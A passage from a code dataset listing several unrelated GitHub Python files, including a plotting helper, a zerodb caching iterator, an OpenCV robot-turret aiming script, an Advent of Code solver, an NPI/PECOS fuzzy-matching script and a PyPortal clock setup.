plot_every)\n plt.figure()\n plt.title(title)\n plt.xlabel(\"Checkpoints\")\n plt.ylabel(loss_label)\n num_checkpoints = len(train_loss)\n X = list(range(num_checkpoints))\n plt.plot(X, train_loss, label=\"training\")\n plt.legend()\n plt.savefig(\"%s_%s.pdf\" % (path, loss_label.lower()))\n\n\ndef plot_train_valid_curve(train_loss, valid_loss, plot_every, path, loss_label):\n #plt.ioff()\n title = \"Training and validation %s for every %d iterations\" % (loss_label.lower(), plot_every)\n plt.figure()\n plt.title(title)\n plt.xlabel(\"Checkpoints\")\n plt.ylabel(loss_label)\n num_checkpoints = len(train_loss)\n X = list(range(num_checkpoints))\n plt.plot(X, train_loss, label=\"training\")\n plt.plot(X, valid_loss, label=\"validation\")\n plt.legend()\n plt.savefig(\"%s_%s.pdf\" % (path, loss_label.lower()))\n\nif __name__ == '__main__':\n train_loss = [20.1,15.3,12.3,11.0,10.0]\n valid_loss = [30.2,29.2,25.2,21.3,20.2]\n train_ppl = [10.1,5.3,2.3,1.0,1.0]\n valid_ppl = [20.2,19.2,15.2,11.3,10.2]\n\n plot_every = 4000\n path = '../exp/debug/valid_train_curve'\n export_train_and_valid_loss(train_loss, valid_loss, train_ppl, valid_ppl, plot_every, path)\n","repo_name":"kenchan0226/dual_view_review_sum","sub_path":"utils/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"72024068388","text":"import six\nfrom persistent import Persistent\nfrom itertools import islice, count\nfrom six.moves import zip as izip, map as imap\nfrom cachetools import LRUCache\nfrom zerodb.storage import prefetch\n\n\nclass Sliceable(object):\n def __init__(self, f, cache_size=1000, length=None):\n \"\"\"\n Makes a sliceable, cached list-like interface to an iterator\n :param callable f: Function which inits the iterator\n \"\"\"\n self.f = f\n self.cache = LRUCache(cache_size)\n self.stop = 0\n self.length = length\n self.iterator = iter(f())\n\n def __iter__(self):\n for i in count():\n y = self.__getitem__(i)\n yield y\n # We get StopIteration error once we're done\n\n def dictify(self):\n for obj in self.__iter__():\n if hasattr(obj, \"_p_activate\"):\n obj._p_activate()\n yield {k: v for k, v in six.iteritems(obj.__dict__) if not k.startswith(\"_\")}\n\n def __len__(self):\n if self.length is None:\n if hasattr(self.iterator, \"__len__\"):\n return len(self.iterator)\n else:\n return len(list(self.__iter__()))\n else:\n if callable(self.length):\n return self.length()\n else:\n return self.length\n\n def __getitem__(self, key):\n try:\n if isinstance(key, int) and (key >= 0):\n if key in self.cache:\n return self.cache[key]\n elif key < self.stop:\n self.stop = 0\n self.iterator = iter(self.f())\n\n delta = key - self.stop\n result = next(islice(self.iterator, delta, delta + 1))\n self.cache[key] = result\n self.stop = key + 1\n return result\n\n elif isinstance(key, slice):\n if key.start is None and key.stop is None:\n # Whole sequence is asked\n return list(self.f())\n start = key.start or 0\n step = key.step or 1\n\n indexes = count(start, step)\n index_upd = start\n while (key.stop is None or index_upd < key.stop) and index_upd in self.cache:\n index_upd += step\n\n if index_upd < self.stop and (key.stop is None or index_upd < key.stop):\n self.iterator = iter(self.f())\n result = list(islice(self.iterator, start, key.stop, step))\n for i, value in izip(indexes, result):\n self.cache[i] = value\n self.stop = i + 1 if key.stop is None else key.stop\n return result\n\n else:\n result = [self.cache[i] for i in six.moves.xrange(start, index_upd, step)]\n\n if key.stop is None:\n result_upd = list(islice(self.iterator, index_upd - self.stop, None, step))\n elif index_upd < key.stop:\n result_upd = list(islice(self.iterator, index_upd - self.stop, key.stop - self.stop, step))\n else:\n result_upd = []\n for i, value in izip(indexes, result_upd):\n self.cache[i] = value\n self.stop = key.stop\n return result + result_upd\n\n else:\n raise KeyError(\"Key must be non-negative integer or slice, not {}\"\n .format(key))\n\n except StopIteration:\n self.iterator = self.f()\n self.stop = 0\n raise\n\n def __repr__(self):\n \"\"\" Visually appealing output showing first 5 elements of the data \"\"\"\n first_el = self[:6]\n is_long = len(first_el) > 5\n reprs = [i.__repr__() for i in first_el[:5]]\n if is_long:\n reprs.append(\"...\")\n if len(reprs) <= 1:\n return \"[\" + \"\".join(reprs) + \"]\"\n else:\n l = len(reprs)\n out = []\n for i, s in enumerate(reprs):\n if i == 0:\n s = \"[\" + s\n else:\n s = \" \" + s\n if i == l - 1:\n s = s + \"]\"\n else:\n s = s + \",\"\n out.append(s)\n return \"\\n\".join(out)\n\n def __unicode__(self):\n return self.__repr__()\n\n\nclass DBList(Sliceable):\n def __init__(self, query_f, db, **kw):\n \"\"\"\n :param function query_f: Function which returns results of the query in format (size, uids)\n :param zerodb.DB db: Currend DB 
instance\n \"\"\"\n self.db = db\n\n def get_object(uid):\n obj = db._objects[uid]\n obj._p_uid = uid\n return obj\n\n def f():\n self.length, it = query_f()\n return imap(get_object, it)\n\n super(DBList, self).__init__(f, **kw)\n\n\nclass ListPrefetch(Sliceable):\n prefetch_size = 20\n\n def __getitem__(self, key):\n previous_stop = self.stop\n result = super(ListPrefetch, self).__getitem__(key)\n if self.stop != previous_stop:\n # Cache-ahead\n try:\n if isinstance(key, six.integer_types):\n tail = super(ListPrefetch, self).__getitem__(slice(key + 1, key + self.prefetch_size + 1))\n elif isinstance(key, slice):\n if key.stop:\n tail = super(ListPrefetch, self).__getitem__(slice(key.stop + 1, key.stop + self.prefetch_size + 1))\n else:\n tail = []\n except StopIteration:\n # If we've finished right at this element, that's not an error\n tail = []\n\n # Fetching objects needed\n if isinstance(result, list):\n prefetch(result + tail)\n elif isinstance(result, Persistent):\n prefetch([result] + tail)\n return result\n\n\nclass DBListPrefetch(ListPrefetch, DBList):\n def __init__(self, query_f, db, **kw):\n DBList.__init__(self, query_f, db, **kw)\n","repo_name":"nucypher/zerodb","sub_path":"zerodb/util/iter.py","file_name":"iter.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","stars":1567,"dataset":"github-code","pt":"70"}
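For context on the Sliceable wrapper above: it takes a factory that can restart the underlying iterator, caches values as they stream past, and rebuilds the iterator whenever an index behind the current position is requested. A hypothetical usage sketch, assuming the class is importable from the module above:

# Hypothetical usage of zerodb.util.iter.Sliceable
s = Sliceable(lambda: (i * i for i in range(10)))
print(s[3])    # 9  -- advances the iterator to index 3, caching along the way
print(s[1:4])  # [1, 4, 9] -- restarts the iterator since index 1 is behind the cursor
print(len(s))  # 10 -- no length given, so it falls back to exhausting a fresh iterator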
+{"seq_id":"34794148427","text":"import cv2 as cv\nimport numpy as np\nimport serial\nimport time\n\nser = serial.Serial(\"COM5\",115200,timeout=0.5)\n\nrobot_yaw_angle = 0.0 #机器人云台水平角度值\nrobot_pitch_angle = 0.0 #\nrobot_shoot_speed = 0.0 #\n\ndef get_data():\n while True:\n data_count = ser.inWaiting()\n\n if data_count != 0 :\n if data_count == 7 :\n recv = ser.read(7)\n print(recv)\n tmp_yaw = int.from_bytes(recv[1:3], byteorder='big', signed=True)\n tmp_pitch = int.from_bytes(recv[3:5], byteorder='big', signed=True)\n tmp_shootspeed = int.from_bytes(recv[5:6], byteorder='big', signed=False)\n \n robot_yaw_angle = tmp_yaw/100.0\n robot_pitch_angle = tmp_pitch/100.0\n robot_shoot_speed = tmp_shootspeed/10.0\n \n print(\"yaw-\",robot_yaw_angle,\" pitch-\",robot_pitch_angle,\" shoot-\",robot_shoot_speed) \n\n else:\n ser.reset_input_buffer()\n \n time.sleep(0.1)\n\ndef fill_like_flood(image):\n h , w , c= image.shape\n mask = np.zeros((h+2,w+2),dtype=np.uint8)\n cv.floodFill(image,mask,(10,10),(0,0,0),(50,50,50),(220,220,220),cv.FLOODFILL_FIXED_RANGE)\n return image\n\ndef bag_of_image(image):\n _size = image.size\n image = np.ascontiguousarray(image,dtype=np.int32)\n black_num = np.sum(image == 0)\n white_num = _size - black_num\n return [black_num,white_num]\n\ndef point_predict(detected_point):\n center_x = 472\n center_y = 197\n center_point = [center_x,center_y]\n center_point = np.array(center_point)\n detected_point = np.array(detected_point)\n t = 10 # ms\n speed = 60 # °/s\n angle = speed * t / 1000\n rotation_matrix = np.array([[np.cos(angle),-1 * np.sin(angle)],[np.sin(angle),np.cos(angle)]])\n prediction_point = center_point + np.dot(rotation_matrix,(detected_point - center_point))\n scale = 70 / 92 # cm/pixel\n prediction_point_3d = (prediction_point - center_point) * scale\n prediction_point_3d = np.array([prediction_point_3d[0],prediction_point_3d[1],0])\n return prediction_point_3d\n\n# pitch angle : up and down ; yaw angle : left and right\ndef angle_predict(prediction_point_3d): \n\tv = 15 # m/s\n\tg = 9.8 # m/s^2\n\tcamera_point_3d = np.array([-90,80,800])\n\tprint(camera_point_3d.shape)\n\txz_camera = np.array([camera_point_3d[0],camera_point_3d[2]])\n\txz_prediction = np.array([prediction_point_3d[0],prediction_point_3d[2]])\n\thypotenuse_distance = (np.sum((xz_camera - xz_prediction)**2))**0.5\n\t# yaw angle\n\tvertical_distance = camera_point_3d[2]\n\tyaw_angle = np.arccos(vertical_distance / hypotenuse_distance)\n\t# pitch angle\n\theight = prediction_point_3d[1] - camera_point_3d[1]\n\tpitch_angle = np.arctan((v**2-(v**4-g*(2*height*(v**2) + g*(camera_point_3d[2]**2))))/(g*camera_point_3d[2]))\n\treturn (yaw_angle/3.14*180,pitch_angle/3.14*180)\n\ndef control_shoot(detect_state , yaw_angle ,pitch_angle,shoot_control):\n\tbuf=b'\\xAA' + detect_state.to_bytes(length=1,byteorder='big',signed=False) + int((-1)*yaw_angle*100).to_bytes(length=2,byteorder='big',signed=True) + int((-1)*pitch_angle*100).to_bytes(length=2,byteorder='big',signed=True) + shoot_control.to_bytes(length=1,byteorder='big',signed=False)\n\tchecksum = 0x00 # 十六进制\n\tfor i in range(1,7):\n\t\tchecksum += buf[i]\n\tchecksum &= 0xFF # 都是1,则为1,0xFF为11111111\n\tbuf += checksum.to_bytes(length=1,byteorder='big',signed=False)\n\tser.write(buf)\n\tno_shoot = 1\n\tbuf=b'\\xAA' + detect_state.to_bytes(length=1,byteorder='big',signed=False) + int(yaw_angle*100).to_bytes(length=2,byteorder='big',signed=True) + int(pitch_angle*100).to_bytes(length=2,byteorder='big',signed=True) + 
no_shoot.to_bytes(length=1,byteorder='big',signed=False)\n\tchecksum = 0x00 # 十六进制\n\tfor i in range(1,7):\n\t\tchecksum += buf[i]\n\tchecksum &= 0xFF # 都是1,则为1,0xFF为11111111\n\tbuf += checksum.to_bytes(length=1,byteorder='big',signed=False)\n\tser.write(buf)\n\n\ndef main():\n\tcap = cv.VideoCapture(1)\n\tret = True\n\ti = 0\n\tmtx = np.array([[1.03782597e+03,0.00000000e+00,3.40535909e+02],\n\t\t\t[0.00000000e+00,1.03660967e+03,2.52234990e+02],\n\t\t\t[0.00000000e+00,0.00000000e+00,1.00000000e+00]])\n\tdist = np.array([[-1.16797326e-01,-1.73850970e+00,\n\t\t\t2.96839053e-03,-1.12024427e-03,5.30806455e+01]])\n\t\n\t# 云台矫正\n\t'''\n\tdata_count = ser.inWaiting()\n\tif data_count != 0 :\n\t\tif data_count == 7 :\n\t\t\trecv = ser.read(7)\n\t\t\tprint(recv)\n\t\t\ttrue_yaw_angle = 100\n\t\t\ttrue_pitch_angle = 100\n\t\t\ttmp_yaw = int.from_bytes(recv[1:3], byteorder='big', signed=True)\n\t\t\ttmp_pitch = int.from_bytes(recv[3:5], byteorder='big', signed=True)\n\t\t\ttmp_shootspeed = int.from_bytes(recv[5:6], byteorder='big', signed=False)\n\t\t\trobot_yaw_angle = tmp_yaw/100.0\n\t\t\trobot_pitch_angle = tmp_pitch/100.0\n\t\t\trobot_shoot_speed = tmp_shootspeed/10.0\n\t\t\tprint(\"yaw-\",robot_yaw_angle,\" pitch-\",robot_pitch_angle,\" shoot-\",robot_shoot_speed)\n\t\t\trobot_yaw_angle = true_yaw_angle - robot_yaw_angle\n\t\t\trobot_pitch_angle = true_pitch_angle - robot_pitch_angle\n\t\t\trobot_detect_state = 1\n\t\t\trobot_shoot_control = 1\n\t\t\tbuf=b'\\xAA' + robot_detect_state.to_bytes(length=1,byteorder='big',signed=False) + int(robot_yaw_angle*100).to_bytes(length=2,byteorder='big',signed=True) + int(robot_pitch_angle*100).to_bytes(length=2,byteorder='big',signed=True) + robot_shoot_control.to_bytes(length=1,byteorder='big',signed=False)\n\t\t\tchecksum = 0x00 # 十六进制\n\t\t\tfor i in range(1,6):\n\t\t\t\tchecksum += buf[i]\n\t\t\tchecksum &= 0xFF # 都是1,则为1,0xFF为11111111\n\t\t\tbuf += checksum.to_bytes(length=1,byteorder='big',signed=False)\n\t\t\tser.write(buf)\n\t\telse:\n\t\t\tser.reset_input_buffer()\n\t\t'''\n\twhile ret:\n\t\tret , frame = cap.read()\n\t\tif ret :\n\t\t\tframe = cv.resize(frame, (640,480), interpolation = cv.INTER_LINEAR)\n\t\t\th, w = frame.shape[:2]\n\t\t\tnewcameramtx, roi = cv.getOptimalNewCameraMatrix(mtx, dist, (w,h), 1, (w,h))\n\t\t\tframe = cv.undistort(frame, mtx, dist, None, newcameramtx)\n\t\t\timg_BGR = fill_like_flood(frame)\n\t\t\timg_GRAY = cv.cvtColor(img_BGR,cv.COLOR_BGR2GRAY)\n\t\t\tret_1,img_thresh_1 = cv.threshold(img_GRAY,240,255,cv.THRESH_TOZERO_INV)\n\t\t\tret_2,img_thresh_2 = cv.threshold(img_thresh_1,100,255,cv.THRESH_BINARY)\n\t\t\timg = cv.bitwise_not(img_thresh_2)\n\t\t\tcontours,hierarchy = cv.findContours(img,cv.RETR_TREE,cv.CHAIN_APPROX_SIMPLE)\n\t\t\tcv.drawContours(img,contours,-1,(0,255,0),2)\n\n\t\t\tfor contour in contours:\n\t\t\t\tlw_rate = 0\n\t\t\t\tarea_rate = 0\n\t\t\t\trect = cv.minAreaRect(contour)\n\t\t\t\twidth = max([rect[1][0],rect[1][1]])\n\t\t\t\theight = min([rect[1][0],rect[1][1]])\n\t\t\t\tif height != 0:\n\t\t\t\t\tlw_rate = width / height\n\t\t\t\tarea = cv.contourArea(contour)\n\t\t\t\tif width + height != 0:\n\t\t\t\t\tarea_rate = area / (width + height)\n\n\t\t\t\tif 1.5 < lw_rate and lw_rate < 2.0 and area > 300 and area < 700 :\n\t\t\t\t\ti += 1\n\t\t\t\t\tx_range_1 = int(rect[0][0]) - 30\n\t\t\t\t\tx_range_2 = int(rect[0][0]) + 30\n\t\t\t\t\ty_range_1 = int(rect[0][1]) - 30 \n\t\t\t\t\ty_range_2 = int(rect[0][1]) + 30\n\t\t\t\t\timg_classify = img[y_range_1:y_range_2,x_range_1:x_range_2]\n\t\t\t\t\tfeature 
= bag_of_image(img_classify)\n\t\t\t\t\tprint(feature)\n\t\t\t\t\tif feature[0] > 1000 and feature[0] < 1500 and feature[1] > 2000 and feature[1] < 3300:\n\t\t\t\t\t\tcv.rectangle(img,(x_range_1,y_range_1),(x_range_2,y_range_2),(0,0,255),2)\n\t\t\t\t\t\tdetected_point = [int(0.5*(x_range_1+x_range_2)),int(0.5*(y_range_1+y_range_2))]\n\t\t\t\t\t\tangle = angle_predict(point_predict(detected_point)) # located in [-pi/2,pi/2]\n\t\t\t\t\t\tprint(angle)\n\t\t\t\t\t\tcontrol_shoot(1,angle[0],angle[1],1)\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\t\t\t\n\t\tcv.imshow('image',img)\n\t\tif cv.waitKey(20)& 0xFF == 'q':\n\t\t\tbreak\n\n\tcap.release()\n\tcv.destroyAllWindows()\n\nmain()","repo_name":"SC-Levi/Mac_file","sub_path":"opencv/python-opencv/grab.py","file_name":"grab.py","file_ext":"py","file_size_in_byte":7480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14269440361","text":"from typing import Callable\nimport day03.binary as binary\n\n\nBinary = binary.Binary\n\n\nclass Report(tuple[Binary]):\n @property\n def size(self):\n return len(self)\n\n @property\n def n_bits(self):\n return len(self[0])\n\n\ndef build_report(lines: list[str]) -> Report:\n return Report(\n binary.parse(line)\n for line in lines\n )\n\n\ndef get_power_consumption(report: Report):\n return get_gamma_rate(report) * get_epsilon(report)\n\n\ndef get_gamma_rate(report: Report) -> int:\n half = report.size // 2\n binary_result = Binary(\n sum(b[bit] for b in report) > half\n for bit in range(report.n_bits)\n )\n return binary.to_int(binary_result)\n\n\ndef get_epsilon(report: Report) -> int:\n return 2 ** report.n_bits - 1 - get_gamma_rate(report)\n\n\ndef get_life_support_rating(report: Report) -> int:\n return get_co2_scrubber_rating(report) * get_oxygen_generator_rating(report)\n\n\ndef get_oxygen_generator_rating(report: Report) -> int:\n binary_result = _dichotomize(\n report,\n split_predicate=lambda value, j: value[j],\n keep_predicate=lambda v0, v1: v1 if len(v1) >= len(v0) else v0,\n )\n return binary.to_int(binary_result)\n\n\ndef get_co2_scrubber_rating(report) -> int:\n binary_result = _dichotomize(\n report,\n split_predicate=lambda value, j: value[j],\n keep_predicate=lambda v0, v1: v1 if len(v1) < len(v0) else v0,\n )\n return binary.to_int(binary_result)\n\n\ndef _dichotomize(\n report: Report,\n split_predicate: Callable[[Binary, int], bool],\n keep_predicate: Callable[[list[Binary], list[Binary]], list[Binary]],\n) -> Binary:\n binaries = report\n for j in range(report.n_bits):\n left, right = _split_binaries(binaries, lambda b: split_predicate(b, j))\n binaries = keep_predicate(left, right)\n if len(binaries) == 1:\n return binaries[0]\n raise ValueError(f'Did not reach unique value in: {binaries}')\n\n\ndef _split_binaries(\n binaries: list[Binary],\n predicate: Callable[[Binary], bool],\n):\n left: list[Binary] = []\n right: list[Binary] = []\n for b in binaries:\n if predicate(b):\n right.append(b)\n else:\n left.append(b)\n return left, right\n","repo_name":"adjerbetian/AOC2021","sub_path":"day03/diagnostic_report.py","file_name":"diagnostic_report.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"70344029986","text":"import pandas as pd\nfrom fuzzywuzzy import fuzz\n\n# Read the CSV file into the DataFrame 'df'\nurl = 'https://raw.githubusercontent.com/benz3927/Healthcare-Data-Queries/main/data/complete.csv'\ndf = pd.read_csv(url)\n\n# Function to calculate similarity score\ndef calculate_similarity_score(col1, col2):\n similarity_score = df.apply(lambda row: fuzz.token_sort_ratio(str(row[col1]), str(row[col2])), axis=1)\n return similarity_score/100\n\n# List of columns to compare and add similarity scores\ncolumns_to_compare = [\n ('NPI_First_Name', 'PECOS_First_Name'),\n ('NPI_Last_Name', 'PECOS_Last_Name'),\n ('NPI_Middle_Initial', 'PECOS_Middle_Initial'),\n ('NPI_Gender_Code', 'PECOS_Gender_Code'),\n ('NPI_Address_Line_1', 'PECOS_Address_Line_1'),\n ('NPI_City', 'PECOS_City'),\n ('NPI_State', 'PECOS_State'),\n ('NPI_Zip_Code', 'PECOS_Zip_Code')\n]\n\n# Reset the index of the DataFrame\ndf.reset_index(drop=True, inplace=True)\n\n# Iterate through the list of columns to compare and calculate similarity scores\nfor col1, col2 in columns_to_compare:\n similarity_score = calculate_similarity_score(col1, col2)\n score_column_name = f'{col1}_String_Distance_Score'\n # Handle missing values and set the string distance score to 0\n similarity_score[df[col1].isnull() | df[col2].isnull()] = 0\n df.insert(df.columns.get_loc(col2) + 1, score_column_name, similarity_score)\n print(f\"Similarity scores for columns {col1} and {col2} added as '{score_column_name}'.\")\n\n# Export the new DataFrame to a CSV file\ndf.to_csv('weighted_similarity_scores.csv', index=False)\n\n# Read the CSV file into the DataFrame 'df'\nurl2 = 'https://raw.githubusercontent.com/benz3927/Healthcare-Data-Queries/main/weighted_similarity_scores.csv'\ndf = pd.read_csv(url2)\n\n# Create a new DataFrame to store matched pairs\noutput_data = []\nrow_labels = []\n\nfor index, row in df.iterrows():\n npi_data = [\n row['Matched_NPI'], row['NPI_First_Name'], row['NPI_Last_Name'], row['NPI_Middle_Initial'],\n row['NPI_Gender_Code'], row['NPI_Address_Line_1'], row['NPI_City'],\n row['NPI_State'], row['NPI_Zip_Code']\n ]\n \n pecos_data = [\n row['Matched_NPI'], row['PECOS_First_Name'], row['PECOS_Last_Name'], row['PECOS_Middle_Initial'],\n row['PECOS_Gender_Code'], row['PECOS_Address_Line_1'], row['PECOS_City'],\n row['PECOS_State'], row['PECOS_Zip_Code']\n ]\n \n output_data.extend([npi_data, pecos_data])\n row_labels.extend(['NPI', 'PECOS'])\n\n# Create a new DataFrame for the matched pairs\noutput_df = pd.DataFrame(output_data, columns=[\n 'NPI', 'First Name', 'Last Name', 'Middle Initial', 'Gender',\n 'Address Line 1', 'City', 'State', 'Zip Code'\n])\noutput_df.insert(0, 'Row Label', row_labels)\n\n# Export the new DataFrame to a CSV file\noutput_csv_path = '/Users/benzhao/Documents/GitHub/Healthcare-Data-Queries/data/matched_pairs.csv'\noutput_df.to_csv(output_csv_path, index=False)\n\nprint(\"New CSV file 'matched_pairs.csv' has been created with matched pairs and alternating row labels.\")\n","repo_name":"benz3927/Healthcare-Data-Queries","sub_path":"similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12720245307","text":"import time\nimport board\nimport busio\nimport displayio\nimport terminalio\nimport adafruit_tmp117\nfrom adafruit_ds3231 import DS3231\nfrom digitalio import DigitalInOut\nimport neopixel\nimport adafruit_touchscreen\nfrom adafruit_esp32spi import adafruit_esp32spi\nfrom adafruit_ntp import NTP\nfrom adafruit_pyportal import PyPortal\nfrom adafruit_display_text.bitmap_label import Label\nfrom adafruit_display_shapes.rect import Rect\nfrom adafruit_display_shapes.circle import Circle\nfrom adafruit_display_shapes.triangle import Triangle\nfrom adafruit_bitmap_font import bitmap_font\nfrom adafruit_displayio_layout.layouts.tab_layout import TabLayout\n\n\n# +-------------------------------------------------------+\n# | Definition for variables in the past defined as global|\n# +-------------------------------------------------------+\n# The gVars class is created\n# to elminate the need for global variables.\n\n\nclass gVars:\n def __init__(self):\n self.gVarsDict = {\n 0: \"my_debug\",\n 1: \"rtc\",\n 2: \"temp_sensor\",\n 3: \"lStart\",\n 4: \"o_secs\",\n 5: \"c_secs\",\n 6: \"dt_refresh\",\n 7: \"sDT_old\",\n 8: \"t0\",\n 9: \"t1\",\n 10: \"t2\",\n 11: \"default_dt\",\n 12: \"pge3_lbl_dflt\",\n 13: \"pge4_lbl_dflt\",\n 14: \"online_time_present\",\n 15: \"temp_in_REPL\",\n 16: \"old_temp\",\n 17: \"use_ntp\",\n 18: \"use_txt_in_month\",\n 19: \"use_usa_notation\",\n 20: \"content_sensor_idx\",\n 21: \"ntp_refresh\",\n 22: \"nHH_old\",\n 23: \"next_NTP_sync\",\n 24: \"s_cnt\",\n 25: \"five_min_cnt\",\n 26: \"next_NTP_sync_t1\",\n 27: \"next_NTP_sync_t3\",\n 28: \"temp_in_fahrenheit\",\n }\n\n self.gVars_rDict = {\n \"my_debug\": 0,\n \"rtc\": 1,\n \"temp_sensor\": 2,\n \"lStart\": 3,\n \"o_secs\": 4,\n \"c_secs\": 5,\n \"dt_refresh\": 6,\n \"sDT_old\": 7,\n \"t0\": 8,\n \"t1\": 9,\n \"t2\": 10,\n \"default_dt\": 11,\n \"pge3_lbl_dflt\": 12,\n \"pge4_lbl_dflt\": 13,\n \"online_time_present\": 14,\n \"temp_in_REPL\": 15,\n \"old_temp\": 16,\n \"use_ntp\": 17,\n \"use_txt_in_month\": 18,\n \"use_usa_notation\": 19,\n \"content_sensor_idx\": 20,\n \"ntp_refresh\": 21,\n \"nHH_old\": 22,\n \"next_NTP_sync\": 23,\n \"s_cnt\": 24,\n \"five_min_cnt\": 25,\n \"next_NTP_sync_t1\": 26,\n \"next_NTP_sync_t3\": 27,\n \"temp_in_fahrenheit\": 28,\n }\n\n self.g_vars = {}\n\n # self.clean()\n\n def write(self, s, value):\n if isinstance(s, str):\n if s in self.gVars_rDict:\n n = self.gVars_rDict[s]\n # print(\"myVars.write() \\'{:\" \">20s}\\'found in self.gVars_rDict,\n # key: {}\".format(s, n))\n self.g_vars[n] = value\n else:\n raise KeyError(\n \"variable '{:\" \">20s}' not found in self.gVars_rDict\".format(s)\n )\n else:\n raise TypeError(\n \"myVars.write(): param s expected str, {} received\".format(type(s))\n )\n\n def read(self, s):\n RetVal = None\n if isinstance(s, str):\n if s in self.gVars_rDict:\n n = self.gVars_rDict[s]\n if n in self.g_vars:\n RetVal = self.g_vars[n]\n return RetVal\n\n def clean(self):\n self.g_vars = {\n 0: None,\n 1: None,\n 2: None,\n 3: None,\n 4: None,\n 5: None,\n 6: None,\n 7: None,\n 8: None,\n 9: None,\n 10: None,\n 11: None,\n 12: None,\n 13: None,\n 14: None,\n 15: None,\n 16: None,\n 17: None,\n 18: None,\n 19: None,\n 20: None,\n 21: None,\n 22: None,\n 23: None,\n 24: None,\n 25: None,\n 26: None,\n 27: None,\n 28: None,\n }\n\n def list(self):\n for i in range(0, len(self.g_vars) - 1):\n print(\n \"self.g_vars['{:\"\n \">20s}'] = {}\".format(\n self.gVarsDict[i], self.g_vars[i] if i in self.g_vars else \"None\"\n )\n 
)\n\n\n# ---------- End of class gVars ------------------------\n\nmyVars = gVars() # create an instance of the gVars class\n\nmyVars.write(\"my_debug\", False)\n\n# Adjust here the date and time that you want the RTC to be set at start:\nmyVars.write(\"default_dt\", time.struct_time((2022, 5, 14, 11, 42, 0, 5, -1, -1)))\n\n# start_time = time.monotonic()\n\n# -------------- Setting myVars elements ----------------------------------\nmyVars.write(\"rtc\", None)\nmyVars.write(\"temp_sensor\", None)\nmyVars.write(\"lStart\", True)\nmyVars.write(\"o_secs\", 0) # old seconds\nmyVars.write(\"c_secs\", 0) # current seconds\n# dt_refresh is used to flag when more or less static elements\n# in datetime stamp have to be refreshed\nmyVars.write(\"dt_refresh\", True)\nmyVars.write(\"sDT_old\", \"\")\nmyVars.write(\"t0\", None)\nmyVars.write(\"t1\", None)\nmyVars.write(\"t2\", None)\n# default_dt already set above\nmyVars.write(\"pge3_lbl_dflt\", \"The third page is fun!\")\nmyVars.write(\"pge4_lbl_dflt\", \"The fourth page is where it's at\")\nmyVars.write(\"online_time_present\", False)\nmyVars.write(\"temp_in_REPL\", False)\nmyVars.write(\"old_temp\", 0.00)\nmyVars.write(\"use_txt_in_month\", True)\nmyVars.write(\"use_usa_notation\", True)\nmyVars.write(\"use_ntp\", True)\nmyVars.write(\"content_sensor_idx\", None)\nmyVars.write(\"ntp_refresh\", True)\nmyVars.write(\"next_NTP_sync\", 0)\nmyVars.write(\"s_cnt\", 0)\nmyVars.write(\"five_min_cnt\", 0)\nmyVars.write(\"next_NTP_sync_t1\", \"Next NTP sync in \")\nmyVars.write(\"next_NTP_sync_t3\", \" (mm:ss)\")\nmyVars.write(\"temp_in_fahrenheit\", True)\n# nHH_old is used to check if the hour has changed.\n# If so we have to re-sync from NTP server\n# (if not using an external RTC)\nmyVars.write(\"nHH_old\", -1)\n\nif myVars.read(\"my_debug\"):\n # print list of all variables in myVars\n myVars.list()\n# -------------------------------------------------------------------------\n# degs_sign = chr(186) # I preferred the real degrees sign which is: chr(176)\n\n# If you are using a board with pre-defined ESP32 Pins:\nesp32_cs = DigitalInOut(board.ESP_CS)\nesp32_ready = DigitalInOut(board.ESP_BUSY)\nesp32_reset = DigitalInOut(board.ESP_RESET)\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\n\n# ------------- Screen Setup ------------- #\npyportal = None\ntimeout_cnt = 0\nwhile pyportal is None:\n try:\n pyportal = PyPortal(\n esp=esp, external_spi=spi, debug=True\n ) # esp=esp, external_spi=spi) # create a PyPortal object\n if pyportal is not None:\n break\n except ValueError: # Occurred the error: \"SCK in use\".\n # Also occurred the error \"SPEAKER_ENABLE in use\"\n time.sleep(0.5)\n timeout_cnt += 1\n if timeout_cnt > 10:\n print(\"Timeout occurred while trying to create a PyPortal object\")\n raise\n\nmonths = {\n 0: \"Dum\",\n 1: \"Jan\",\n 2: \"Feb\",\n 3: \"Mar\",\n 4: \"Apr\",\n 5: \"May\",\n 6: \"Jun\",\n 7: \"Jul\",\n 8: \"Aug\",\n 9: \"Sep\",\n 10: \"Oct\",\n 11: \"Nov\",\n 12: \"Dec\",\n}\n\ni2c = board.I2C()\n\nif myVars.read(\"use_ntp\"):\n print(\n \"\\ntest_page_layout.showing_page_index test with I2C Temperature sensor and NTP \\\nsynchronized local time\"\n )\nelse:\n print(\"\\nTabLayout test with I2C Temperature sensor and I2C Realtime clock\")\nprint(\"Add your WiFi SSID, WiFi password and Timezone in file: secrets.h\\n\")\n\nif myVars.read(\"my_debug\"):\n while not i2c.try_lock():\n pass\n\n try:\n while True:\n print(\n \"I2C addresses found:\",\n 
[hex(device_address) for device_address in i2c.scan()],\n )\n time.sleep(2)\n break\n\n finally: # unlock the i2c bus when ctrl-c'ing out of the loop\n i2c.unlock()\n\n# -------- Setting up SDCard ---------------------\n# Is not needed to be done here: the SPI module is taking care of initializing the SD Card.\n# See: https://andyfelong.com/2019/07/pyportal-access-the-micro-sd-card/#:~:text= \\\n# It%20also%20has%20support%20for%20a%20micro%2DSD%20Card.&text=Software%20support%20 \\\n# for%20PyPortal%20is, \\\n# %2Din%20serial%2Dport%20terminal.77\n#\n# NOTE: there is also the board.SD_CARD_DETECT pin (33)(but I don't know yet how to interface it)\n####\n\n# you'll need to pass in an io username and key\n# Get wifi details and more from a secrets.py file\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"WiFi secrets are kept in secrets.py, please add them there!\")\n raise\n\nif myVars.read(\"my_debug\"):\n if esp.status == 